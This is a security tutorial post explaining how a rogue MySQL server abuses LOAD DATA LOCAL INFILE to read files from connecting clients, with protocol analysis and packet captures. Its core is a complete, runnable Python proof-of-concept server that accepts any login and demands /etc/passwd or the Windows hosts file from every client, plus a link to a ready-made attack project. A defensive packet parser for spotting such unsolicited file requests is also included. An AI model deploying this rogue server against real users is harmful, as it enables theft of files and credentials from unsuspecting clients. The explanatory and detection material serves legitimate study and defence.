2025-04-01 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through a MySQL client attack chain: how a malicious MySQL server can abuse the LOAD DATA LOCAL INFILE feature to read files from a client that connects to it. The content is concise and easy to follow, and I hope you get something out of it.
0x01 Body
MySQL LOAD DATA characteristics
The LOAD DATA statement can load files on the server host, and if you specify the LOCAL keyword, you can load client files.
Let's look at the description of the official document.
The official MySQL documentation states the risks of LOAD DATA and places strict restrictions on its use, such as the secure_file_priv setting.
In this environment the value of secure_file_priv is /var/lib/mysql-files/. So what do the possible settings of secure_file_priv mean?
If secure_file_priv is NULL, import and export are not allowed at all.
If secure_file_priv names a directory, MySQL import and export can only take place inside that directory.
If secure_file_priv is not set (empty), there are no restrictions.
There are two commonly used forms of the LOAD DATA statement, one operating on client files and one on server files:
LOAD DATA LOCAL INFILE "file path" INTO TABLE table_name FIELDS TERMINATED BY 'delimiter';
LOAD DATA INFILE "file path" INTO TABLE table_name FIELDS TERMINATED BY 'delimiter';
The first statement reads a file on the client and stores it in the given table; the second reads a file on the server and stores it in the given table. We should focus on LOAD DATA LOCAL INFILE, because under certain conditions it lets us read arbitrary files!
However, as mentioned above, secure_file_priv limits the path from which files can be read, so let's configure it first so that the later steps work.
Protocol analysis
Environment: Ubuntu 16.04, MySQL 5.7.23
Tool: tcpdump
The packet capture command used here is:
tcpdump -i lo port 3306 -w mysql.cap -v
The interaction between mysql client and server is mainly divided into two stages: handshake authentication phase and command execution phase.
The handshake starts with the TCP three-way handshake. Here we simplify and focus on analyzing the command execution phase.
First, the server sends a Greeting packet to the client.
It mainly carries banner information about MySQL and the server!
The client then sends an Authentication packet to make the login request; it carries the username, the password (hashed with two rounds of SHA1) and some configuration.
Next, the first query packets sent by the client are some initialization queries, for example: select @@version_comment limit 1
Then comes our query packet containing the LOAD DATA LOCAL INFILE statement!
After receiving our query, the server returns a response packet containing the filename it requests!
Finally, the client sends a Response TABULAR packet to the server carrying the contents of the requested file!
At this point the file has been read from the client, and we can read any file without being limited by secure_file_priv!
So here is the problem. Let's look at the official documentation again!
From the official documentation we learn that when the server requests the client's file, nothing ties the requested file to the statement the client sent: the server only has to supply a file name, and the client sends that file. So if we build a malicious server, all it needs to do when a client connects is forge the file-transfer request packet to read a file from the client. The precondition, of course, is that the LOAD DATA LOCAL setting is enabled on the client.
The process is shown in the figure:
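To make the protocol observation above concrete from the defender's side, here is an added example (not code from the original post or from the linked projects) that decodes the fields of a server Greeting packet, including whether the CLIENT_LOCAL_FILES capability is advertised, and flags the rogue-server pattern: a server answering a query that was not LOAD DATA LOCAL INFILE with a 0xFB file request. The packet bytes are constructed inline for the example, not taken from a real capture.

```python
import re
import struct

CLIENT_LOCAL_FILES = 0x80       # capability bit: LOAD DATA LOCAL INFILE supported
COM_QUERY = 0x03
LOCAL_INFILE_REQUEST = 0xFB     # first payload byte of a server "send me this file" response
LOAD_LOCAL_RE = re.compile(r"\s*load\s+data\s+(?:(?:low_priority|concurrent)\s+)?local\s+infile", re.I)

def packet(seq, payload):
    """Wrap a payload in the MySQL 3-byte little-endian length + 1-byte sequence id header."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload

def split_packet(raw):
    """Return (sequence id, payload) of one packet; reject truncated data."""
    if len(raw) < 4:
        raise ValueError("truncated packet")
    length = int.from_bytes(raw[:3], "little")
    payload = raw[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet")
    return raw[3], payload

def parse_handshake(raw):
    """Decode the Protocol::HandshakeV10 fields a defender cares about."""
    _, p = split_packet(raw)
    if p[0] != 0x0A:
        raise ValueError("not a v10 handshake")
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()
    pos = end + 1
    conn_id = struct.unpack_from("<I", p, pos)[0]
    pos += 4 + 8 + 1                        # connection id, auth-plugin-data-part-1, filler
    cap_lo = struct.unpack_from("<H", p, pos)[0]
    cap_hi = struct.unpack_from("<H", p, pos + 5)[0]   # after charset (1) and status flags (2)
    caps = cap_lo | (cap_hi << 16)
    return {"version": version, "connection_id": conn_id, "capabilities": caps,
            "local_files": bool(caps & CLIENT_LOCAL_FILES)}

def unsolicited_infile(query_pkt, response_pkt):
    """Filename the server asked for if it answered a non-LOAD DATA LOCAL query with 0xFB, else None."""
    _, q = split_packet(query_pkt)
    _, r = split_packet(response_pkt)
    if not q or q[0] != COM_QUERY or not r or r[0] != LOCAL_INFILE_REQUEST:
        return None
    if LOAD_LOCAL_RE.match(q[1:].decode(errors="replace")):
        return None                         # the client really did ask to upload this file
    return r[1:].decode(errors="replace")

# Constructed sample traffic: a greeting advertising CLIENT_LOCAL_FILES (caps 0x807ff7ff),
# the client's usual first query, and a rogue server answering it with a file request.
SAMPLE_HANDSHAKE = packet(0, b"\x0a5.7.23-constructed\x00" + struct.pack("<I", 45)
    + b"\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00" + struct.pack("<HBHHB", 0xF7FF, 8, 2, 0x807F, 21)
    + b"\x00" * 10 + b"hiY_R_cU`dSR\x00" + b"mysql_native_password\x00")
SAMPLE_QUERY = packet(0, b"\x03select @@version_comment limit 1")
SAMPLE_RESPONSE = packet(1, b"\xfb/etc/passwd")
```

Running unsolicited_infile over each query/response pair in a capture of client traffic is a practical way to spot a rogue server, since a legitimate server only sends 0xFB in reply to a LOAD DATA LOCAL INFILE statement.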
Build a malicious server
To build a malicious server, three conditions must be met:
First, send the Server Greeting packet to the MySQL client.
Then wait for the client to send a Query packet.
Then reply with a file transfer request to read the file.
First we need to know how to construct the File Transfer and Server Greeting packets; their formats are given in the official MySQL documentation.
File Transfer packet format: https://dev.mysql.com/doc/internals/en/com-query-response.html
We must wait for a query request from the client before we can reply with the server's request to read the file.
Greeting packet format: https://dev.mysql.com/doc/internals/en/connection-phase-packets.html#packet-Protocol::Handshake
Test
PoC
Source code: https://www.vesiluoma.com/abusing-mysql-clients/
#!/usr/bin/env python3
# coding: utf8
import socket
import struct

# File to request from the connecting client.
# linux:
FILESTRING = b"/etc/passwd"
# windows:
# FILESTRING = b"C:\\Windows\\system32\\drivers\\etc\\hosts"

HOST = "0.0.0.0"  # open for eeeeveryone! ^_^
PORT = 3306
BUFFER_SIZE = 1024


def packet(seq, payload):
    """Prefix a payload with the MySQL 3-byte little-endian length and 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


# 1 Greeting (Protocol::HandshakeV10), seq 0. Field values as in the original byte string:
#    server version 5.6.28-0ubuntu0.14.04.1, connection id 45, capabilities 0x807ff7ff
#    (CLIENT_LOCAL_FILES = 0x80 is set), charset 8, status 2, plugin mysql_native_password.
greeting = packet(0,
    b"\x0a"                                   # protocol version 10
    + b"5.6.28-0ubuntu0.14.04.1\x00"          # server version, NUL-terminated
    + struct.pack("<I", 45)                   # connection id
    + b"\x40\x3f\x59\x26\x4b\x2b\x34\x60"     # auth-plugin-data-part-1 (8 bytes)
    + b"\x00"                                 # filler
    + struct.pack("<H", 0xf7ff)               # capability flags, lower 16 bits
    + b"\x08"                                 # character set
    + struct.pack("<H", 0x0002)               # status flags
    + struct.pack("<H", 0x807f)               # capability flags, upper 16 bits
    + b"\x15"                                 # length of auth plugin data (21)
    + b"\x00" * 10                            # reserved
    + b"hiY_R_cU`dSR\x00"                     # auth-plugin-data-part-2 (13 bytes)
    + b"mysql_native_password\x00")           # auth plugin name

# 2 Accept all authentications: an OK packet (seq 2) whatever credentials the client sent
authok = packet(2, b"\x00\x00\x00\x02\x00\x00\x00")

# 3 Payload: LOCAL INFILE request (0xfb + filename), seq 1, answering the client's first query
payload = packet(1, b"\xfb" + FILESTRING)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
while True:
    conn, addr = s.accept()
    print("Connection from:", addr)
    conn.send(greeting)
    while True:
        data = conn.recv(BUFFER_SIZE)          # client's login (HandshakeResponse) packet
        print(" ".join("%02x" % b for b in data))
        conn.send(authok)
        data = conn.recv(BUFFER_SIZE)          # client's first query, e.g. select @@version_comment limit 1
        conn.send(payload)
        print("[*] Payload send!")
        data = conn.recv(BUFFER_SIZE)          # the file contents the client sends back
        if not data:
            break
        print("Data received:", data)
        break
    # Don't leave the connection open.
    conn.close()
Github Project: https://github.com/allyshka/Rogue-MySql-Server
Attack effect
To test with the GitHub project, first run the script as follows:
We can see that any file on the client can be read.
The above is how the MySQL client attack chain works.